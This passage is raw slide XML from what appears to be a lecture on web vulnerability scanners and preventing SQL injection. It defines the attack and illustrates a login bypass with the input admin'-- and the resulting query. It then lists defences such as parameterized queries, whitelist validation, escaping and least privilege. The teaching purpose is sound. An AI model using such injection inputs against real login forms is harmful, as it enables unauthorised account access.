              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-509" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-254" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Vulnerability  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-265" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Scanners</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-340" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-220" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(WAVS)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9381" y="4546741"/>
            <a:ext cx="10017760" cy="2538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250" spc="-195" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>HOW </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-1110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>TO </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-1170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PREVENT </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-985">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLI  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="8250" spc="-930">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITIES?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593153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70"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-680"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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4752" y="2931714"/>
            <a:ext cx="15716250" cy="135763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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerability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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that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-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>consists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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacker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-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interfering</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with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45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the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-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>queries </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-320">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>makes </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-880">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="4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9842" y="6183675"/>
            <a:ext cx="2529566" cy="252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982759" y="6134263"/>
            <a:ext cx="2900016" cy="2902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98386" y="4930395"/>
            <a:ext cx="9380855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54520" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-270" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Attacker	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-170" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-365" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-250" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Server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4497" y="4937934"/>
            <a:ext cx="1975485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-114" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-240" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-280" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>e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07264" y="6861131"/>
            <a:ext cx="3940175" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3751278" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3751278" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876929" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782691" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782691" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876929" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751278" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3751278" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751278" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751278" y="62825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3876929" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3782691" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782691" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876929" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939754" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876929" y="62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17990" y="5904607"/>
            <a:ext cx="1502410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185">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="580">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>--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82256" y="6861131"/>
            <a:ext cx="3940175" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3751299" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3751299" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876950" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782712" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782712" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876950" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751299" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3751299" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751299" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751299" y="62825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3876950" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3782712" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782712" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876950" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939775" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876950" y="62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068502" y="4879298"/>
            <a:ext cx="3533140" cy="16313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95"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1120140" algn="l"/>
                <a:tab pos="1304290" algn="l"/>
                <a:tab pos="1673860" algn="l"/>
                <a:tab pos="2042160" algn="l"/>
                <a:tab pos="2596515" algn="l"/>
                <a:tab pos="2781300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="434">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="434">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>users  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>username	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="420">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="420">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>admin'--'	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>password	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>=	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="875">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>'';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8215038" y="5875423"/>
            <a:ext cx="3440429" cy="3442970"/>
            <a:chOff x="8215038" y="5875423"/>
            <a:chExt cx="3440429" cy="3442970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8215038" y="5875423"/>
              <a:ext cx="3440314" cy="34428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878473" y="7350561"/>
              <a:ext cx="346795" cy="3467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875960" y="7958710"/>
              <a:ext cx="346795" cy="3467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887990" y="7350561"/>
            <a:ext cx="2067560" cy="344805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476884">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="565"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1450" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Username</a:t>
            </a:r>
            <a:endParaRPr sz="1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86221" y="7950229"/>
            <a:ext cx="2067560" cy="344805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476250">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1450" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Password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1370012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70"/>
              <a:t>Preventing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-905"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-395"/>
              <a:t>Vulnerabilities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4752" y="2875032"/>
            <a:ext cx="14772640" cy="636079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560"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Primary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275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Defenses:</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-37719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1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-175" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Option </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-335" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>1: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-170" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-165" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-245" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Prepared </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-215" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Statements </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-270" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(Parameterized</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-725" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-215" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Queries)</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Option </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-330">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Procedures</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-540">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Partial)</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="385"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Option </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Whitelist </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-710">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Partial)</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="365"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-95">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Option </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>4: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-290">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>All </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Supplied </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-405">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Partial)</a:t>
            </a:r>
            <a:endParaRPr sz="39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670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buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Additional</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Defenses:</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Also: </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Enforcing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Least</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-165">
                <a:latin typeface="Arial"/>
